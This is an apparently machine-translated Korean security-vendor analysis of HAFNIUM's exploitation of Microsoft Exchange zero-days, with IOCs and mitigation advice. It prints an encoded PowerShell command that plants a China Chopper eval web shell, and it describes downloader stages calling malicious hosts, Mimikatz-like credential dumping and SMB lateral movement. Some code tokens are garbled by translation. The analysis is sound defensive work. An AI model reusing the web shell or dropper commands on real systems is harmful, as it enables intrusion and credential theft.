2월 XNUMX일, Microsoft는 HAFNIUM이라는 위협 그룹이 XNUMX가지를 적극적으로 악용하고 있다고 발표했습니다. 제로 데이 취약점 Exchange 서버에서. Microsoft는 대역 외 보안 업데이트(CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)를 출시했습니다. 이 업데이트를 통해 공격자는 유효한 계정 자격 증명 없이도 이메일 계정에 접근하고 서버에서 맬웨어를 실행할 수 있습니다.
위협 행위자들이 Microsoft Exchange의 제로데이 서버 측 요청 위조(SSRF) 취약점(CVE-2021-26855)을 악용하고 있습니다. 이를 통해 공격자는 인증을 우회하고 원격 코드 실행 권한을 획득할 수 있습니다.
CVE-2021-27065는 인증 후 임의 파일 쓰기 취약점입니다. .aspx 확장자를 가진 파일을 생성하고 코드를 삽입하는데, 공격자는 이 취약점을 악용하고 있었습니다. 대부분의 경우 공격자는 감염된 서버에 "China Chopper 웹 셸"을 업로드하는 것으로 추정됩니다.
공격 체인
이러한 Exchange 서버 악용에는 IOC, 웹 셸 또는 aspx 파일이 손상될 수 있는 징후가 있습니다. 악용이 발생하면 공격자는 Exchange 서버의 특정 위치인 "C:\inetpub\wwwroot\aspnet_client\discover.aspx"에 웹 셸을 설치합니다. 이 공격에서 aspnet_client.aspx, load.aspx, discover.aspx, supp0rt.aspx, accepted.aspx, error_page.aspx, shell.aspx, logaaa.aspx, dict.aspx 등과 같은 일반적인 이름을 가진 여러 aspx 파일이 발견되었으며, 오프라인 주소록(OAB) 파일에서도 웹 셸이 발견되었습니다.
공격자는 Exchange 오프라인 주소록의 aspx 페이지에 코드를 삽입할 수 있으며, 이 페이지는 추가 공격에 사용됩니다. 아래는 저희가 발견한 내용입니다. PowerShell을 손상된 Exchange 서버에서 의심스러운 매개변수를 사용하여 실행 중입니다. 이 PowerShell 코드 실행은 취약점을 악용하여 파일 쓰기/수정이 수행되었음을 보여줍니다.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W 숨김 -ep 우회 -enc 시도 {$p="C:\\inetpub\\wwwroot\\aspnet_client\\error.aspx";
$FileStream=New-ObjectIO.FileStream@($p,[IO.FileMode]::Create); $FileStream.Write([Text.Encoding]::UTF8.GetBytes('외부 URL:https://f/
"서버">functionPage_Load(){/*ExchangeService*/eval(요청["안전하지 않음"],"안전하지 않음");} '), 0,147);if($FileStream){$FileStream.Flush();$FileStream.Dispose();$f=(ls$p);$t=”2015-09-13″;$f.CreationTime=$t;$f.LastAccessTime=$t;$f.LastWriteTime=$t;$f.Attributes=”읽기 전용”,
"시스템", "숨김", "notcontentindexed", "아카이브"}}catch{}.
웹 셸 분석
중국 헬기 웹 셸은 이러한 공격에서 발견되는 작고 한 줄짜리 스크립트입니다. 이 파일의 내용은 다소 이상하고 불완전합니다. 구조상 eval 또는 unsafe와 같은 단어를 호출하는 HTTP GET 매개변수 인수를 받는데, 이는 다양한 공격에 취약합니다.
예-
“https://f/ function Page_Load(){eval(Request [“XOrSeMr3kgWUdFf6″],”unsafe”);} ”
OAB 파일의 ExternalUrl 필드 구문은 HTTP 요청에서 변수를 가져와 서버를 통해 명령줄을 실행하는 것과 같습니다. "https://f/"는 적절한 구문이 아니며, 일부 무작위 문자 매개변수가 표시됩니다. 즉, 코드 실행 전 인증에 사용되는 키입니다. 위의 경우 "XOrSeMr3kgWUdFf6"가 중요합니다. OAB 파일의 WhenChanged 필드에서 파일 수정 날짜를 확인할 수 있습니다.
aspx 파일의 스크린샷-
그림 1. ASPX 파일
웹 셸 파일에서 스크립트의 변형을 확인했습니다. orange, ananas와 같은 정적 파일과 파일에 사용된 Base64 문자열 인코딩이 있습니다. 탐지를 피하기 위해 문자열을 분할하고 Base64 문자열로 인코딩하는 복잡한 방법이 사용됩니다.
그림 2. ExternalUrl 목록
그림 3. 경로 목록
착취 후 활동
공격 후, 서버에 대한 완전한 접근 권한을 얻기 위한 여러 공격 시도가 있었습니다. 여기에는 다양한 운영자가 오픈 소스 도구와 방법을 사용하여 백도어나 수많은 맬웨어를 심는 것이 포함됩니다.
변형 1 :
서버에서 여러 개의 PowerShell 다운로드가 감지되었습니다. 첫 번째는 PowerShell 스크립트 base64로 인코딩된 코드는 http[:]//p.estonine[.]com/p?e에서 다음 단계를 다운로드합니다. 그런 다음 다음 단계를 다운로드하려고 하면 PowerShell 스크립트가 다운로드된 것을 확인할 수 있습니다.
그림 4. 첫 번째 PowerShell 스크립트
다운로드한 PowerShell 스크립트는 base64 인코딩과 강력한 난독화 기술을 위한 Zlib 압축 코드를 사용하여 표현식을 호출해야 합니다.
그림 5. 다음 단계 PS
아래 코드에서 발견된 스크립트를 디코딩하고 압축 해제한 후, 해당 코드는 다양한 검사를 수행하고 MAC 주소, 바이러스 백신 프로그램(AV), OS 버전, 도메인 이름, 사용자 이름과 같은 정보를 수집합니다. 그런 다음 "Global\PSEXEC" 뮤텍스를 생성하고 프로세스 실행에 필요한 관리자 권한을 확인합니다. ccc.log는 CNC 서버 연결을 위해 설계되었습니다.
그림 6. PowerShell 코드 2단계
스크립트는 "http[:]//CDN.chatcdn[.]net"에 접속을 시도합니다. 이 도메인은 오랫동안 악성으로 확인되었으며, 이전 DLTMiner 확산 과정에서 PowerShell 스크립트에 사용되었습니다. 관리자 권한으로 실행하는 경우 "p?hig" 파일을 다운로드하고, 그렇지 않으면 "p?low" 파일을 다운로드합니다. 그런 다음 Winnet 예약 작업 런타임 간격을 생성합니다. 서버가 응답하지 않으면 "188.166.162.201" IP에서 update.png? 파일을 다운로드합니다.
그림 7. PowerShell 코드 2단계
다운로드된 파일은 PowerShell 스크립트이며, 난독화된 데이터를 포함하고 있습니다. 코드를 디코딩하면 약 2MB 크기의 스크립트 파일과 방대한 코드 줄이 생성됩니다. 이 코드에서는 SMB를 통한 공격에 사용된 오픈소스 코드, SMB 세션 설정 요청, SMB 세션 로그오프 요청, invoke-SMBExec, 그리고 일부 측면 이동 기법이 관찰되었습니다.
그림 8. PowerShell 3단계
Base64 코드를 디코딩한 후, 코드에 대한 추가 조사 결과 Mimikatz 페이로드와 유사한 두 개의 실행 파일이 발견되었습니다. 이는 계정 로그인 및 비밀번호 정보를 획득하는 데 사용되는 자격 증명 덤핑 오픈소스 프로그램입니다. 자격 증명은 측면 이동을 수행하고 중요하거나 제한된 정보에 접근하는 데 사용될 수 있습니다.
변형 2 :
저희가 관찰한 또 다른 PowerShell 스크립트는 GitHub 페이지에서 파일을 다운로드하려고 시도합니다. 파일 확장자는 .png이지만, 실제로는 PE 실행 파일입니다.
그림 9. PowerShell 스크립트 변형 2
저희는 이러한 PowerShell 스크립트에 대해 더 자세히 조사하고 있으며, 감염 사슬에서 Microsoft Exchange Server의 취약점을 이용한 몇 가지 흥미로운 사실을 알려드릴 것입니다.
IOC
| 웹셸 해시 | PE 해시 |
| 0CD6F96A3460BE65C70C88A764F6EC56 | 3547D371C975779D6E0EDDF145936FB1 |
| 137E3A611C961EF33AAF49CCAA35E710 | 8AEA2AE91CC084731A08AA231E79A430 |
| 1A06924B507FA9A48E94D8AB819C7E42 | 9ff2613df0fc30afbc552f40360c37e7 |
| 1B18EC3D2B27CE39E83D602CB8BA84FE | cad2ee0a2e085a319505c4c4b68b3d2b |
| 1EAC1B6CE217C4BD31E93A3D913AF010 | E438712E336982548B884CBFBFEE6C9E |
| 217747243CB1FB9EAF6999284D7B9FCB | |
| 3068ECC45C32C24C8FD56FC0CB0A8829 | |
| 3446CEEE4BEA404ED72E14E154763428 | |
| 35B332744E614EF07A94FF4AC03B1F1A | |
| 35FCA708A86BEE43F068AD53C289963D | |
| 3CDBE5DF6383A6604737076F9E97E25A | |
| 49A62802887B6CA23FD067B942631698 | |
| 4D0C46CA88840A2649CD0C8596EA0AF9 | |
| 50499D3A3F4A072FD2FA3C5C5E651E25 | |
| 5970381424FB282AD7683431EB38C4B5 | |
| 5DD588C96A81586EE653BDB80D301A87 | |
| 65159FE1E1AE21F68CD235A8C045787A | |
| 6654AA50456B7D7C10061957DA128EF6 | |
| 6B2AEC787E30369911265CFA932192F4 | |
| 6D5F087C1D2E5A98E8EF00FE7883A531 | |
| 6F5909B3060D0F9AD4C4F4F6EFBAAC27 | |
| 87DCB5D6CCD2D614C34197915A9ADE15 | |
| 8B99A15118D4FB563CDEFA97BFEC6BFE | |
| 8CBF320BC0E0BE871E04152AFF775238 | |
| 8D5315AA11C3DBCDDFBA1A8D8D695F6B | |
| 93448E9EC4EEDA337879B148475B0E77 | |
| 94881B3621AF9A4DC64678258364A82B | |
| B82E014EE386C569710A9B03A7294A4C | |
| B86798F8F643CA76F20916C9347AE1C8 | |
| BA7235A228BEB5B8D1C630DA46B17E5F | |
| BEE691F207A19D782CCFBE5887B91015 | |
| C11680638FFF66F5DD494151D4A77389 | |
| CB9BE56C0DA7D625277823C796A10B12 | |
| D02AD7D92D348E011F4C63CBA6BA639D | |
| D08194CBB0D72C2609719C8E87D9036D | |
| D2EE996FBFB6ACA47CFD4319543626A3 | |
| D70FBE37FA09856158361411624591E7 | |
| D8A14C2BC15DC04B0BAE8A992990D41F | |
| DEADBB5A1E9669E268D2C1CC5D9965B0 | |
| E6F23A3282C7F0A693433815B4CFFC8F | |
| EDB48532A2AA88558474FFEA64355129 | |
| EF374AAB0EFFF9914A83362E0896F651 | |
| EFD4DC84D422420E887E6400FECCDDAD | |
| F7D74667839288B659EC1D87217FC749 | |
| FBB4182C9A441688FD71996DE7445A6F |
도메인/IP
- http[:]//p.estonine[.]com/p?e
- http[:]//cdn.chatcdn[.]net
- http[:]//40.115.162.72/89[.]png
- https[:]//raw.githubusercontent[.]com/eluken890enlk/exmails/main
-
188.166.162.201
-
178.21.164.68
Quickheal 감지 이름
- HTTP/CVE-2021-26855.MES!PT
- HTTP/MSExchangeServer.SSRF!PT
- CVE-2021-26855.웹셸
제품 개요
위협 행위자들은 취약한 Microsoft Exchange 서버를 표적으로 삼아 이러한 제로데이 취약점을 악용하고 있으며, 위협 행위자들은 Exchange 서버에 접근하거나 서버를 장악하기 위해 여러 가지 사후 악용 기술을 사용하고 있으므로 최신 보안 업데이트로 패치하는 것이 필수적입니다.
Quick Heal에서는 IPS와 파일 기반 탐지 기능에 이 취약점에 대한 탐지 기능을 추가하여 이미 손상된 서버와 웹 셸과 같은 다른 IOC의 존재를 식별했습니다.
완화
- 모든 Microsoft Exchange 서버를 Microsoft에서 출시한 최신 패치 버전으로 즉시 업데이트하는 것을 강력히 권장합니다.
- 이러한 공격/악용을 방지하려면 환경에 보안 제품을 갖추고 정기적으로 업데이트하는 것이 좋습니다.
- 공급업체에서 제공하는 보안 패치를 제때 적용하는 것은 시스템을 보호하고 보안을 유지하는 데 도움이 됩니다.
- 서버가 이미 손상된 경우 패치를 적용하기 전에 서버를 정리해야 합니다.
- Microsoft에서 공유한 아래 완화 도구는 이 취약점에 사용할 수 있습니다.
- https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
- https://github.com/microsoft/CSS-Exchange/tree/main/Security
